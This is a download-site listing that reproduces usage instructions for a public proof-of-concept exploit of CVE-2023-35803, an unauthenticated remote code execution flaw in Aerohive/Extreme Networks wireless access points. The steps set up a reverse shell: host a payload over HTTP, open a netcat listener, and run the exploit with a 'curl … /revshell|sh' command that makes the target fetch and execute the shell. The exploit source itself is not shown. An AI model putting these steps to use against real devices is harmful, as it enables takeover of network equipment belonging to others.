PoC Exploit for CVE-2023-35803

PoC Exploit for CVE-2023-35803

vPython by Prapattimynk

CVE-2023-35803 - Unauthenticated RCE in Extreme Networks/Aerohive Wireless Access PointsPoC for ARM-based access points running HiveOS/IQ Engine <10.6r2.Edit revshell to point to your she

Android Android 5.0Exploits And POCs
( 238 ratings )
Price: $0
File CVE-2023-35803 Exploit
Publisher Prapattimynk
Genre Exploits And POCs
Size Unknown
File Type Python
Os All
Mod Version Python
Report Report
CVE-2023-35803 Exploit is the most famous version in the CVE-2023-35803 Exploit series of publisher
Download

CVE-2023-35803 – Unauthenticated RCE in Extreme Networks/Aerohive Wireless Access Points

PoC for ARM-based access points running HiveOS/IQ Engine <10.6r2.

  1. Edit revshell to point to your shell catcher IP/port
  2. Host the reverse shell: python3 -m http.server
  3. Open a shell catcher: nc -lvnp 1337
  4. Run the POC (may take a few minutes): python3 poc.py <ip of ap> "curl <ip of attack box>:8000/revshell|sh"

Writeup here: https://research.aurainfosec.io/pentest/bee-yond-capacity/



Recommended for You

You may also like

Comments

Your email address will not be published. Required fields are marked *

Next Post X
Ads Blocker Image Powered by Code Help Pro

AdBlocker Detected!!!

We have detected that you are using extensions to block ads. Please support us by disabling these ads blocker.